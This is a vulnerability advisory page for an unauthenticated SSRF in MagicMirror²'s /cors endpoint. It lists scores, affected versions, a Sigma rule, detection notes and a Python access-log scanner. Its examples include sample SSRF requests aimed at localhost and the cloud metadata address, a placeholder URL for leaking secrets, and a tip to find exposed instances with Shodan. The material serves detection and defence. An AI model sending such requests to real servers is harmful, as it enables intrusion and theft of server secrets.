CVE-2026-42281
published 2026-05-14

Priority: P2 (67, high)
CVSS 3.1: 8.6 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)
EXPLOIT
EPSS: 1.62% (73.1th percentile)
MagicMirror² is an open source modular smart mirror platform. Prior to 2.36.0, an unauthenticated Server-Side Request Forgery (SSRF) vulnerability in the /cors endpoint allows any remote attacker to force the MagicMirror² server to perform arbitrary HTTP requests to internal networks, cloud metadata services, and localhost services. The endpoint also expands environment variable placeholders (**VAR_NAME**), enabling exfiltration of server-side secrets. This vulnerability is fixed in 2.36.0.

Affected (2 ranges)

Vendor          Product      Version range   Fixed in
magicmirror     magicmirror  < 2.36.0        2.36.0
magicmirrororg  magicmirror  < 2.36.0        2.36.0

Detection & IOCs (extracted from sources)

URL: /cors?url=http://127.0.0.1:8080/version
Path: /cors
Sigma:
    detection:
        keywords:
            - '/cors?url='
        condition: keywords
  • Detect unauthenticated GET requests to the /cors endpoint with a 'url' query parameter — this is the direct attack vector for SSRF exploitation.
  • Monitor for requests to /cors?url= targeting internal/loopback addresses (127.0.0.1, 169.254.169.254, 10.x, 172.16.x, 192.168.x) which indicate SSRF abuse against internal networks or cloud metadata services.
  • Watch for out-of-band DNS interactions triggered via /cors?url= with an external collaborator/interactsh URL, indicating blind SSRF probing.
  • The /cors endpoint expands environment variable placeholders in the format **VAR_NAME**, so monitor response bodies for patterns matching environment variable values (secrets, tokens) being returned to external requesters.
  • Use Shodan to identify exposed MagicMirror instances via the title fingerprint, then probe for the vulnerable /cors endpoint.
  • The vulnerability is unauthenticated — no credentials or session tokens are required to exploit the /cors endpoint, meaning any network-accessible MagicMirror instance is at risk.
  • The Nuclei template uses a two-step flow: first confirm the target is a MagicMirror instance (body contains 'MagicMirror'), then probe the /cors endpoint. Detection logic stops at first match between the localhost probe and the OOB DNS probe.
  • Affected versions are all releases prior to 2.36.0 (i.e., <= 2.35.0). The fix is exclusively in version 2.36.0 and later.
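The detection points above can be turned into a small access-log scanner. The code below is an added example, not code from this page's sources or from the MagicMirror² project: it assumes a combined-format web access log captured in front of MagicMirror², classifies the host named in the /cors url parameter (loopback, link-local such as the 169.254.169.254 metadata address, RFC 1918 private, or external), and also flags url parameters carrying the **VAR_NAME** placeholder syntax the endpoint expands. The log lines are constructed samples.

```python
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample access-log lines in the common "combined" layout; not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [14/May/2026:10:01:02 +0000] "GET /cors?url=http://127.0.0.1:8080/version HTTP/1.1" 200 512
203.0.113.7 - - [14/May/2026:10:01:05 +0000] "GET /cors?url=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F HTTP/1.1" 200 1024
203.0.113.9 - - [14/May/2026:10:02:10 +0000] "GET /cors?url=http://localhost:8080/ HTTP/1.1" 200 300
203.0.113.9 - - [14/May/2026:10:02:15 +0000] "GET /cors?url=http://example.net/x?token=**API_KEY** HTTP/1.1" 200 64
198.51.100.4 - - [14/May/2026:10:03:00 +0000] "GET /cors?url=https://api.openweathermap.org/data/2.5/weather HTTP/1.1" 200 2048
198.51.100.4 - - [14/May/2026:10:03:30 +0000] "GET /css/main.css HTTP/1.1" 200 4096
"""

# source ip, timestamp, method, request target, status; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Names that point back at the server itself (assumed list; extend for your environment).
LOCAL_NAMES = {"localhost", "localhost.localdomain"}
# The placeholder syntax the /cors endpoint expands, per the advisory text: **VAR_NAME**
PLACEHOLDER_RE = re.compile(r"\*\*[A-Za-z_][A-Za-z0-9_]*\*\*")


def classify_host(host):
    """Classify a URL host as loopback, link-local, private, external or unresolved."""
    if host is None:
        return "unresolved"
    h = host.strip("[]").lower()  # tolerate bracketed IPv6 literals
    if h in LOCAL_NAMES:
        return "loopback"
    try:
        ip = ipaddress.ip_address(h)
    except ValueError:
        return "external"  # a DNS name; no resolution is attempted offline
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:  # 169.254.0.0/16 covers the cloud metadata address
        return "link-local"
    if ip.is_private:
        return "private"
    return "external"


def analyze_request(target):
    """Inspect one request target; return a finding dict, or None if /cors is not involved."""
    parsed = urlparse(target)
    if parsed.path != "/cors":
        return None
    urls = parse_qs(parsed.query).get("url")
    if not urls:
        return {"reason": "cors-without-url", "severity": "low", "fetch_host": None}
    # parse_qs already percent-decodes once; a second pass exposes double-encoded targets
    fetch_url = unquote(urls[0])
    fetch = urlparse(fetch_url)
    reasons = []
    host_class = classify_host(fetch.hostname)
    if host_class in ("loopback", "link-local", "private"):
        reasons.append("ssrf-" + host_class)
    if PLACEHOLDER_RE.search(fetch_url):
        reasons.append("env-placeholder")
    # External fetches are the endpoint's normal use by modules, so they stay informational.
    return {
        "reason": ",".join(reasons) or "cors-external",
        "severity": "high" if reasons else "info",
        "fetch_host": fetch.hostname,
    }


def scan_log(text):
    """Return the non-informational findings for every parseable line of an access log."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = analyze_request(m.group("target"))
        if finding and finding["severity"] != "info":
            findings.append({"src": m.group("src"), "ts": m.group("ts"), **finding})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} -> {f['fetch_host']}: {f['reason']} [{f['severity']}]")
```

Run against the sample, the first four /cors requests are reported (two loopback targets, the link-local metadata address, and a placeholder-bearing url) while the weather-API fetch and the static asset are not. In production the same classification should also be applied after DNS resolution, since a hostname under the attacker's control can resolve to a loopback or private address.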

CVSS provenance

NVD, CVSS v3.1: 8.6 HIGH (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)
NVD, CVSS v4.0: 9.2 CRITICAL (CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X)